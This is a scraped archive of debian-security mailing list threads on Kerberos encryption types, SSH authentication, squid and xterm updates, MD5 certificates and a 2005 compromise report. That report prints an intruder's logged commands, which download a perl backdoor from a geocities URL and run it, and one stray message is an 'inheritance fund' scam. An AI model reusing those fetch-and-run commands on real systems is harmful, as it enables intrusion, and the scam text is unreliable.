> "aes256-cts:normal" option to the command to force the enctypes to be
> restricted to 256-bit AES.
> 


We use NFSv4.

PJ


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-10 Thread Peter Jordan 
Russ Allbery, Fri Jul 10 2009 00:55:42 GMT+0200 (CEST):
> Peter Jordan  writes:
>> Russ Allbery, Thu Jul 09 2009 21:51:50 GMT+0200 (CEST):
> 
>>> Ensuring that you use AES enctypes for all keys (disable DES and
>>> ideally also 3DES)
> 
>> How?
> 
> In /etc/krb5kdc/kdc.conf, set the supported_enctypes configuration
> option for your realm to:
> 
> supported_enctypes = aes256-cts:normal
> 
> Note that you'll also need to enable rc4-hmac:normal if you need to do
> cross-realm trust with Active Directory, and you'll need to enable
> des3-hmac-sha1:normal if you have any Java 1.4 clients.
> 
> However, if you also have AFS, which I recall that you do, you can't
> turn it off at that level.  You have to leave DES as a supported enctype
> since the AFS service key at present still has to be DES (although we're
> working on that).  In that case, you have to deal with it at creation
> time for each principal.  In other words, when you do addprinc or ktadd
> for everything other than the AFS service key, pass the -e
> "aes256-cts:normal" option to the command to force the enctypes to be
> restricted to 256-bit AES.
> 


Let the option
master_key_type = des3-hmac-sha1
as it is?

No change in /etc/krb5.conf required?

should i renew all host keys?

PJ


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-09 Thread Peter Jordan 
Russ Allbery, Thu Jul 09 2009 21:51:50 GMT+0200 (CEST):
> Peter Jordan  writes:
> 
>> It would be a stand alone MIT KDC (with krb-rsh) on debian lenny.
>>
>> "safe" in the sense of "you better attack the services which depends on
>> kerberos than kerberos itself"
> 
> That's what we've done at Stanford for many, many years, and I'm
> comfortable doing so.  The Debian MIT Kerberos maintainers (of which I'm
> one) receive advance notice of upcoming security vulnerability
> announcements and always prepare security updates in advance for any KDC
> vulnerabilities.
> 

btw is it possible to use any kind of one time password mechanism with
mit kdc?

thanks,

PJ


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-09 Thread Peter Jordan 
Russ Allbery, Thu Jul 09 2009 21:51:50 GMT+0200 (CEST):
> 
> Ensuring that you use AES enctypes for all keys (disable DES and ideally
> also 3DES) 
> 

How?


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-09 Thread Peter Jordan 
pod, Thu Jul 09 2009 21:38:31 GMT+0200 (CEST):
> Peter Jordan  writes:
> 
>> It is not my decission to isolate kerberos.
>>
>> Is it safe to open kerberos for the world?
> 
> It's not clear that anyone on this list can answer that question since it
> depends on what "safe" and "kerberos" mean in the context of your
> organization.  The meaning of "safe" is defined by the organizational
> security policy and the meaning of "kerberos" will depend on which
> implementation has been used.
> 
> For example there seems to be a school of thought amongst certain
> deployers of Active Directory (a component of which is a kerberos KDC)
> that it should not be exposed more widely than strictly necessary.  There
> are however plenty of deployments of Heimdal and MIT KDCs that are exposed
> to the world and, incidentally, derive much advantage by so doing.
> 
> 

It would be a stand alone MIT KDC (with krb-rsh) on debian lenny.

"safe" in the sense of "you better attack the services which depends on
kerberos than kerberos itself"

PJ


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-09 Thread Peter Jordan 
Russ Allbery, Thu Jul 09 2009 20:45:57 GMT+0200 (CEST):
> Peter Jordan  writes:
> 
>> I want to login passwordless to my ssh server from the internet. vpn
>> is not avaiable and kerberos is not acccessable from outside the
>> lan. How?
> 
> Fix the last problem.  Otherwise, yes, you can't use Kerberos.
> 
> Authentication systems really need to be exposed to all sites from which
> one wishes to authenticate or they're not horribly helpful.
> 

It is not my decission to isolate kerberos.

Is it safe to open kerberos for the world?

PJ


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-09 Thread Peter Jordan 
Noah Meyerhans, Thu Jul 09 2009 18:04:54 GMT+0200 (CEST):
> On Thu, Jul 09, 2009 at 06:02:37PM +0200, Peter Jordan wrote:
>> And how to login passwordless from outside the kerberos network?
> 
> There's no such thing as "outside the kerberos network".
> 
> noah
> 

I want to login passwordless to my ssh server from the internet. vpn is
not avaiable and kerberos is not acccessable from outside the lan. How?

PJ


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-09 Thread Peter Jordan 
Russ Allbery, Thu Jul 09 2009 17:04:06 GMT+0200 (CEST):
> Peter Jordan  writes:
>> Noah Meyerhans, Wed Jul 08 2009 23:13:30 GMT+0200 (CEST):
> 
> 
>> Do you use kerberos/nfsv4 and ssh keys? If yes, how you handle the
>> problem, that the authorized_keys file is not accessable without a krb
>> ticket?
> 
> If you have Kerberos, why would you use ssh keys?  GSS-API is so much
> nicer if you already have a Kerberos environment.
> 

And how to login passwordless from outside the kerberos network?

PJ


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-08 Thread Peter Jordan 
Justus, Tue Jul 07 2009 22:36:31 GMT+0200 (CEST):
> Is there Information on what Versions are affected by this exploit?
> I read something of Version 3.2 and 4.3 in one of the blog entrys
> (http://secer.org/hacktools/0day-openssh-remote-exploit.html), maybe
> someone else could clarify this?
> Would you recommend stopping ssh completely and switching to remote control?
> Regards,
> Justus
> 
> 

I recompiled openssh lenny version for etch without problems. Are there
any reasons against installing this version in etch?

PJ


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-08 Thread Peter Jordan 
Sebastian Posner, Wed Jul 08 2009 23:18:43 GMT+0200 (CEST):
> Jim Popovitch wrote:
> 
>> Is there a way to force keys AND passwd verification?
> 
> Normally you'd want to DISABLE PasswordAuthentication and 
> ChallengeResponseAuthentication - unless you have a special and 
> well-maintained setup like e.g. One-Time-Pads or such - because both can 
> potentially be brute-forced way faster than SSH-keys.

Why not using PasswordAuthentication and/or
ChallangeResponseAuthetication like opie/otpw/freeauth? I think its
better then passwordless ssh keys and strong passwords and fail2ban
should help against brute-force.

PJ


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-08 Thread Peter Jordan 
Noah Meyerhans, Wed Jul 08 2009 23:13:30 GMT+0200 (CEST):
> (Plus we've got Kerberos and don't usually mess around with keys or
> passwords).
> 

Do you use kerberos/nfsv4 and ssh keys? If yes, how you handle the
problem, that the authorized_keys file is not accessable without a krb
ticket?

PJ


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Re: [SECURITY] [DSA 1694-1] New xterm packages fix remote code execution

2009-01-02 Thread Peter Palfrader 
On Fri, 02 Jan 2009, Florian Weimer wrote:

> As an additional precaution, this security update also disables font
> changing

Is this really ncessary?  I use that feature a lot and I rely on it for
most of my desktop setup.  What are other (scriptable) means to change
font size from within an xterm?

Not amused,
Peter
-- 
   |  .''`.  ** Debian GNU/Linux **
  Peter Palfrader  | : :' :  The  universal
 http://www.palfrader.org/ | `. `'  Operating System
   |   `-http://www.debian.org/


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Re: Certification Authorities are recommended to stop using MD5 altogether

2009-01-01 Thread Peter Palfrader 
On Thu, 01 Jan 2009, Cristian Ionescu-Idbohrn wrote:

> Still, the original question was (sort of) whether MD5 signed certificates
> like this one:

> Certificate:
> Data:
> Version: 3 (0x2)
> Serial Number: 1 (0x1)
> Signature Algorithm: md5WithRSAEncryption
> ^
> Issuer: C=ZA, ST=Western Cape, L=Cape Town, O=Thawte Consulting cc, 
> OU=Certification Services Division, CN=Thawte Server 
> CA/emailaddress=server-ce...@thawte.com
> Subject: C=ZA, ST=Western Cape, L=Cape Town, O=Thawte Consulting cc, 
> OU=Certification Services Division, CN=Thawte Server 
> CA/emailaddress=server-ce...@thawte.com

The algorithm used for the self sign doesn't really matter.  What you
care about is md5 used in any place but the root of any cert chains
you encounter.

-- 
       |  .''`.  ** Debian GNU/Linux **
  Peter Palfrader  | : :' :  The  universal
 http://www.palfrader.org/ | `. `'  Operating System
   |   `-http://www.debian.org/


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Re: Microsoft-IIS/6.0 serves up Debian... WTF!

2008-06-08 Thread Peter Palfrader 
On Sun, 08 Jun 2008, Jim Popovitch wrote:

> I would think that neither of those cases immediately passes muster
> with concerned security minded folks.  And, just because you are OK
> with it, it doesn't mean I have to be. ;-)

Clearly the people in charge are.  Can we move on to relevant stuff now?

-- 
weasel


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

realpath in PS1 bash

2008-05-19 Thread Peter Kuma 
Hi folks

I didn't receive any response on debian-user, hopefully this is an
appropriate place to ask.

I'm wondering if it would be a good idea to have PS1 set to

'${debian_chroot:+($debian_chroot)[EMAIL PROTECTED]:$(realpath "$(pwd)")\$ '

instead of the default

'${debian_chroot:+($debian_chroot)[EMAIL PROTECTED]:\w\$ '

and make it a suggestion in /etc/skel/.bashrc for those users who want
to see the actual current working directory.

 From a security standpoint you could enter e.g.
/home/someoneelse/somedir/ and see [EMAIL PROTECTED]:/home/someoneelse/somedir/$
in the prompt, but really be in /etc/ if somedir is a (potentially
malicious) symlink to /etc created by a different user. It could get
quite disastrous if you decide to run something like rm -r * in such a
directory.

It won't be very helpful with more sophisticated symlink race
conditions, but it is better than nothing.

Perhaps I should post it to bash package wishlist, what do you think?

Peter Kuma



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: [SECURITY] [DSA 1565-1] New Linux 2.6.18 packages fix several vulnerabilities

2008-05-05 Thread Peter Palfrader 
On Mon, 05 May 2008, Peter Palfrader wrote:

> On Mon, 05 May 2008, Bernd Eckenfels wrote:
> 
> > In article <[EMAIL PROTECTED]> you wrote:
> > > Apropos.  Is there a way to get that information from a vmlinuz file on
> > > disk?  Without booting it, that is.
> > 
> > Interesting enough my (somewhat older) file command does only print "x86
> > boot sector", but I think some magic files supported it. Otherwise you can
> > use "strings vmlinux | fgrep 2."
> 
> This does not appear to work well on at least armel.

Or, more generally, when the kernel is compressed.
http://svn.noreply.org/svn/weaselutils/trunk/nagios-check-running-kernel
is what I delopyed on .debian.org so far.

Cheers, and thanks,
weasel


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: [SECURITY] [DSA 1565-1] New Linux 2.6.18 packages fix several vulnerabilities

2008-05-05 Thread Peter Palfrader 
On Mon, 05 May 2008, Bernd Eckenfels wrote:

> In article <[EMAIL PROTECTED]> you wrote:
> > Apropos.  Is there a way to get that information from a vmlinuz file on
> > disk?  Without booting it, that is.
> 
> Interesting enough my (somewhat older) file command does only print "x86
> boot sector", but I think some magic files supported it. Otherwise you can
> use "strings vmlinux | fgrep 2."

This does not appear to work well on at least armel.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: [SECURITY] [DSA 1565-1] New Linux 2.6.18 packages fix several vulnerabilities

2008-05-04 Thread Peter Palfrader 
On Mon, 05 May 2008, Bernd Eckenfels wrote:

> In article <[EMAIL PROTECTED]> you wrote:
> > Apropos.  Is there a way to get that information from a vmlinuz file on
> > disk?  Without booting it, that is.
> 
> Interesting enough my (somewhat older) file command does only print "x86
> boot sector", but I think some magic files supported it. Otherwise you can
> use "strings vmlinux | fgrep 2."
> 
> I usually use the file name to describe it.

debian.org kernel packages don't however.  Which makes it not exactly
suiteable for a nagios check for "is the running kernel the one on the
fileystem".

Sure, strings | grep works, but that's quite .. ugly and at least gives
the impression of being fragile.

Peter


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: [SECURITY] [DSA 1565-1] New Linux 2.6.18 packages fix several vulnerabilities

2008-05-04 Thread Peter Palfrader 
On Sat, 03 May 2008, Dominic Hargreaves wrote:

> cat /proc/version
> 
> will give you the full version of the booted kernel.

Apropos.  Is there a way to get that information from a vmlinuz file on
disk?  Without booting it, that is.

Peter


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: How about carrying this list on gmane?

2008-01-17 Thread Peter Jordan 
Johannes Graumann, 01/17/08 13:07:

> See subject,
> 
> Joh

gmane.linux.debian.devel.security ???


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Inheritance fund

2007-09-14 Thread Dr Peter Edward 
新しいメールアドレスをお知らせします新しいメールアドレス: [EMAIL PROTECTED]

>From Dr Peter Edward

Director Bank of England

This is to inform you that your fund of $15m has been approved for immediate 
delivery.

[EMAIL PROTECTED]

Thanks.

- Dr Peter Edward

Re: Bug#383030: Fix for one of the two vulnerabilities

2006-08-22 Thread Jens Peter Secher 

On 8/22/06, Martín Ferrari <[EMAIL PROTECTED]> wrote:


I think this patch fixes the first vulnerability reported. I'm CCing
debian-security as it would be good if somebody more seasoned in this
matters could take a look at it (please CC me).


Lukáš Lalinský is upstream maintainer as well as Debian package
maintainer.  He is in the process of dealing with this.

Lukáš, could you put a note about your plans the two open bugs?

Cheers,
--
   Jens Peter Secher
_DD6A 05B0 174E BFB2 D4D9 B52E 0EE5 978A FE63 E8A1 jpsecher gmail com_
A. Because it breaks the logical sequence of discussion
Q. Why is top posting bad?

Re: Command history log for audit trail

2006-06-15 Thread DI Peter Burgstaller 

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

you can run snoopy which will log all commands issued into auth.log
- - Ceers, Peter

On 15.06.2006, at 22:08, [EMAIL PROTECTED] wrote:




I need to set up an audit trail for all commands run on machines.  I
know that the auth.log records who logs in and when, and that each
user's .bash_history has a history of their commands.  But is there  
some

other way to create a log for all commands run on a system?


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact  
[EMAIL PROTECTED]




-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (Darwin)

iEYEARECAAYFAkSRwaMACgkQ8MbZtmDLq6xA/gCguhzC4Y6kaU7TkPBaSvFi0/5c
CG4AniJoy2pckiFN4CfW89MLWJ7VZsoR
=HwJk
-END PGP SIGNATURE-


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Restricting ssh access to internet but not to internal network

2005-11-25 Thread Peter Palfrader 
On Thu, 24 Nov 2005, Patrick wrote:

> I have an server running sshd on Sarge. I want all users to be able to
> access the computer from within the internal network - but restrict
> access from the internet (to users in a particular group). Can this be
> achieved by combining the /etc/hosts.allow or /etc/hosts.deny files and
> the AllowGroup (or AllowUsers) options in sshd configuration file.

You are looking for pam_access.

[EMAIL PROTECTED]:~$ grep -C3 access /etc/pam.d/ssh
# Standard Un*x authentication.
@include common-auth

# do etc/security/access checks
# weasel, Fri, 25 Feb 2005 12:05:42 +0100
account   required pam_access.so # [1]

# Standard Un*x authorization.
@include common-account

[EMAIL PROTECTED]:~$ tail -n5 /etc/security/access.conf
# weasel, Fri, 25 Feb 2005 12:06:57 +0100
+:ALL:127.
+:ALL:192.0.2.
+:weasel:ALL
-:ALL:ALL

HTH.
-- 
 PGP signed and encrypted  |  .''`.  ** Debian GNU/Linux **
messages preferred.| : :' :  The  universal
   | `. `'  Operating System
 http://www.palfrader.org/ |   `-http://www.debian.org/


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: unsubscribe

2005-10-12 Thread Peter Palfrader 
On Tue, 11 Oct 2005, Benjamin Maerte wrote:

> -- 
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact 
> [EMAIL PROTECTED]
> 

Learn to read the mails you're replying to, will you?

Peter
-- 
Gurer fubhyq or fbzr fbeg bs vagryyvtrapr grfg orsber lbh'er nyybjrq gb
wbva n yvfg.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Abwesenheit

2005-09-19 Thread Peter Palfrader 
On Mon, 19 Sep 2005, Florian Weimer wrote:

> > Is there a reason not to simply read the "Precedence: list" header
> > and simply not respond at all ?
> 
> "Precedence: list" is non-standard.  Technically speaking,
> RFC-compliant software should not use it. 8-/

That's not quite correct, software MAY use it.

RFC3834: Recommendations for Automatic Responses to Electronic Mail:

   -  A responder MAY refuse to send a response to a subject message
  which contains any header or content which makes it appear to the
  responder that a response would not be appropriate.  For instance,
  if the subject message contained a Precedence header field
  [I4.RFC 2076] with a value of "list" the responder might guess that
  the traffic had arrived from a mailing list, and would not respond
  if the response were only intended for personal messages.  For
  similar reasons, a responder MAY ignore any subject message with a
  List-* field [I5.RFC 2369].  (Because Precedence is not a standard
  header field, and its use and interpretation vary widely in the
  wild, no particular responder behavior in the presence of
  Precedence is recommended by this specification.)

-- 
 PGP signed and encrypted  |  .''`.  ** Debian GNU/Linux **
messages preferred.| : :' :  The  universal
   | `. `'  Operating System
 http://www.palfrader.org/ |   `-http://www.debian.org/


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: New squid packages 2.4.6-2woody9 restarts very often.

2005-08-23 Thread Peter Blancke 
Daniel Hess <[EMAIL PROTECTED]> dixit:

> It starts to fail when the dstdom_regex acl is activated.

This could be. But -- I think -- also "dstdomain".

Two of my non-correct-working squid-proxy-servers have lines in
squid.conf like these:

- The one server 'acl this_name dstdomain www.domain.tld'
- The other server 'acl that_name dstdom_regex
  "/etc/squid/wanted_url"'

Both servers are failing, so I installed an older version of squid.

Greetings,

Peter Blancke

-- 
Hoc est enim verbum meum!


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: New squid packages 2.4.6-2woody9 restarts very often.

2005-07-26 Thread Peter Blancke 
Luigi Gangitano <[EMAIL PROTECTED]> dixit:

> Il giorno mar, 26/07/2005 alle 03.09 +0200, Daniel Hess ha scritto:
>> I can reproduce this by using wget on an URL which contains an ip
>> (for example: "wget http://193.99.144.85/";).

> Can you please tell me what DNS daemon is at work in this case
> (eg. bind, pdnsd, etc.)?

On a problematic server of mine with the same problem it's bind9.

(Debian/Woody, Squid-2.4.6-2woody9, Kernel 2.4.29)

Greetings

Peter Blancke

-- 
Hoc est enim verbum meum!


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: New squid packages 2.4.6-2woody9 restarts very often.

2005-07-13 Thread Peter Blancke 
Peter Blancke <[EMAIL PROTECTED]> dixit:

> I've had the same problem; since removing squids cache, new
> creating the cache (squid -z) and a new start of squid, the
> 2.4.6-2wood9 works fine and the problem didn't turn up.

I have been pleased prematurely; today the same mistake reoccurs.
Now downgrading is demanded.

Gruss

Peter Blancke

-- 
Hoc est enim verbum meum!


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: New squid packages 2.4.6-2woody9 restarts very often.

2005-07-12 Thread Peter Blancke 
[EMAIL PROTECTED] <[EMAIL PROTECTED]> dixit:

> I have tried to install Version 2.4.6-2woody9 of the squid package
> on our Internet Gateway (Woody). There were no error messages
> during upgrade, but our Client get no connection to the proxy
> afterwards. I "fix" this temporary by reinstalling the previous
> version 2.4.6-2woody8.
>
> Looking in the logfiles shows, that squid 2.4.6-2woody9 restarts
> very often:

I've had the same problem; since removing squids cache, new creating
the cache (squid -z) and a new start of squid, the 2.4.6-2wood9
works fine and the problem didn't turn up.

Greetings

Peter Blancke

-- 
Hoc est enim verbum meum!


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

cvs 1.11.1p1debian-11 is in wrong distribution

2005-07-05 Thread Peter Lundkvist 
cvs 1.11.1p1debian-11 seems to be in the wrong distribution:
should be in woody-security (oldstable) but is in sarge-security.

/peter


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

security for sarge?

2005-05-10 Thread peter green 
in the most recent release update announcement it was said that the freeze
marked the start of security support for sarge

from that mail

>Joey Schulze of the security team has given the thumbs-up for official
>security support for sarge as of the time of the freeze.  Which is now.

however the messages on debian-secuirty alerts make no mention of sarge
whatsoever

can anyone clarify whats going on?

p.s. please CC replies to me as i'm not on this list.



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Conclusion: Compromised system - still ok?

2005-02-07 Thread DI Peter Burgstaller 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Wow you guys,
thank you very much for all your input.
I'll sit down with the manager and we'll discuss which route to take.
My first instinct was to warm up those drives and get the tapes .. but 
I may want to
find out more as you guys have suggested! (Thanks to Jeroen, Alvin and 
Roger)

The system is/was an absolutely unimportant backup-mx so I don't think 
we'll qualify for
three-letter help :)

In any case .. it has been a very interesting sunday indeed. I'll try 
to learn from my
mistakes.

- - Thank you very much, Peter
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (Darwin)
iEYEARECAAYFAkIHL84ACgkQ7qdt1xpQls/J7ACgm2ul7gugzoYVoUdAwZ0D+DrT
xEAAn3iVE30yOjNdGBt3BQ5TDXQWWQzq
=Z6dZ
-END PGP SIGNATURE-
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Compromised system - still ok?

2005-02-06 Thread DI Peter Burgstaller 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hi everybody,
guess it was my time - this time...
Ok .. about 4 hours ago the following happened on one of my machines:
1) Somebody tried from one host (213.215.220.14) a dictionary attack
2) He/She/It got in using the user backup (I know.. I know ..)
3) H/S/I downloaded 2 files from a geocities.com account
4) File 1 - no idea what it is or what it does - cannot find it
5) File 2 - a perl script that "claims" to be a telnet server
After taking the machine offline, I did the following:
a) locked user backup
b) removed password/interactive login from sshd (should have been done 
a long time ago)
c) killed the perl script running as user backup
d) find -user backup -mtime 1 > /tmp/file
e) nmap localhost for all ports
f) checked /tmp/file for "unknown files" - found /tmp/.bash_history
g) moved /tmp/.bash_history off the machine for analysis

Here is the snoopy log:
- 
Feb  6 10:33:26 mail2 sshd[15544]: Accepted password for backup from 
213.215.220.14 port 38842 ssh2
Feb  6 10:33:26 mail2 sshd[22307]: (pam_unix) session opened for user 
backup by (uid=0)
Feb  6 10:33:26 mail2 snoopy[25178]: [backup, uid:34 sid:25178]: -sh
Feb  6 10:33:26 mail2 snoopy[25087]: [backup, uid:34 sid:25178]: id -u
Feb  6 10:33:41 mail2 sshd[22307]: (pam_unix) session closed for user 
backup
Feb  6 10:57:26 mail2 sshd[1306]: Accepted keyboard-interactive/pam for 
backup from 66.40.38.102 port 45424 ssh2
Feb  6 10:57:26 mail2 sshd[4008]: (pam_unix) session opened for user 
backup by (uid=0)
Feb  6 10:57:26 mail2 snoopy[22447]: [backup, uid:34 sid:22447]: -sh
Feb  6 10:57:26 mail2 snoopy[10020]: [backup, uid:34 sid:22447]: id -u
Feb  6 10:57:30 mail2 snoopy[9165]: [backup, uid:34 sid:22447]: ls -all
Feb  6 10:57:35 mail2 snoopy[18242]: [backup, uid:34 sid:22447]: id
Feb  6 10:57:42 mail2 snoopy[27934]: [backup, uid:34 sid:22447]: uname 
- -a
Feb  6 10:57:47 mail2 snoopy[27769]: [backup, uid:34 sid:22447]: cat 
/etc/passwd
Feb  6 10:58:34 mail2 snoopy[19303]: [backup, uid:34 sid:22447]: 
/sbin/ifconfig
Feb  6 10:58:42 mail2 snoopy[31999]: [backup, uid:34 sid:22447]: cat 
/etc/hosts
Feb  6 10:59:06 mail2 snoopy[26230]: [backup, uid:34 sid:22447]: ls -all
Feb  6 10:59:09 mail2 snoopy[3092]: [backup, uid:34 sid:22447]: wget
Feb  6 10:59:26 mail2 snoopy[20851]: [backup, uid:34 sid:22447]: wget 
geocities.com/c0_pampers/jam5.p
Feb  6 10:59:36 mail2 snoopy[25767]: [backup, uid:34 sid:22447]: cat 
shadow.bak
Feb  6 10:59:41 mail2 snoopy[31313]: [backup, uid:34 sid:22447]: ls -all
Feb  6 10:59:51 mail2 snoopy[14269]: [backup, uid:34 sid:22447]: wget 
geocities.com/c0_pampers/jam5.p
Feb  6 11:00:00 mail2 snoopy[1647]: [backup, uid:34 sid:22447]: mv 
jam5.pl.txt .bash_history
Feb  6 11:00:06 mail2 snoopy[22380]: [backup, uid:34 sid:22447]: chmod 
755 .bash_history
Feb  6 11:00:10 mail2 snoopy[29495]: [backup, uid:34 sid:22447]: perl 
.bash_history
Feb  6 11:00:12 mail2 snoopy[29908]: [backup, uid:34 sid:22447]: ps -x
Feb  6 11:00:16 mail2 snoopy[4918]: [backup, uid:34 sid:22447]: ls -all
Feb  6 11:00:18 mail2 snoopy[12984]: [backup, uid:34 sid:22447]: w
Feb  6 11:01:20 mail2 sshd[4008]: (pam_unix) session closed for user 
backup
- 

The telnetserver doesn't seem to make any entires in wtmp hence no 
`last` or `w` entries on the machine.
However, snoopy still sees uses from the user :)

ASAI can say H/S/I hasn't been on my machine since. The firewall didn't 
permit access to the port (34567)
opened by the perl script and my firewall log says no access to that 
port before I tried it from localhost.

The machine runs a linux 2.4.27-grsec-hi woody testing
I'm considering taking it back online with a 2.4.29-grsec-hi, what do 
you guys think?

- - Many thanks, Peter
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (Darwin)
iEYEARECAAYFAkIGSmMACgkQ7qdt1xpQls/FOwCfSDJbpUyuAMES5KYMQKQMVcCd
im0AoIhY+DeJghyPAGm2Fv4RAuWvycQV
=ctGL
-END PGP SIGNATURE-
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: [OT] Collective memory query

2004-10-08 Thread Peter Cordes 
On Wed, Sep 29, 2004 at 10:08:28PM +0200, Adrian 'Dagurashibanipal' von Bidder wrote:
> On Tuesday 28 September 2004 15.49, Bartosz Fenski aka fEnIo wrote:
> > On Mon, Sep 27, 2004 at 06:38:03PM +0200, Adrian 'Dagurashibanipal' von 
> Bidder wrote:
> > > > for foo in `find . -name "something"`
> > >
> > > Note that
> > > $ for foo in `command outputting a list of filenames`
> > >
> > > should *always* be replaced by
> > >
> > > $ said command | while read foo; do ...
> [...]
> > So what is the magic barrier when this should stop working?
> > I'm just curious.
> 
> 
> Hmm. I can't comment on that specifically, for current versions of some 
> shells. I know I have seen 'command line too long' messages in the past 
> when using `find ...` constructs, and I bet that on busybox based resscue 
> disks and other restricted shells this topic will still be relevant.

 The "line too long" limit applies when trying to execve(2) anything.
There's a limit there.  For shell built-ins, there doesn't have to be a
limit, but as you point out, busybox might have one.

> In any case, using the while loop will pipeline the operations so you get 
> full benefit from multitasking.

 Yeah, that's an elegant idiom.  I'll have to remember to use it in the
future. :)

-- 
#define X(x,y) x##y
Peter Cordes ;  e-mail: X([EMAIL PROTECTED] , des.ca)

"The gods confound the man who first found out how to distinguish the hours!
 Confound him, too, who in this place set up a sundial, to cut and hack
 my day so wretchedly into small pieces!" -- Plautus, 200 BC


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: [sec] Re: failed root login attempts

2004-09-28 Thread Peter Cordes 
On Tue, Sep 21, 2004 at 01:45:46PM +0100, Steve Kemp wrote:
> On Sun, 19 Sep 2004, martin f krafft wrote:
>  
> > > If you ask me, logcheck should learn how to evaluate log messages in
> > > their context...
> 
>   If you want to have instant alerts of  problems then logcheck is 
>  what you want.  If you to ignore some things and still receive timely
>  alerts then you're looking at something which can read your mind!
> 
>   If you can define what it is you don't want to see then logcheck
>  can handle that via the pattern files in logchecks ignore.d/ hierarchy.

 Not if the pattern you want to ignore is more than one line.  egrep is
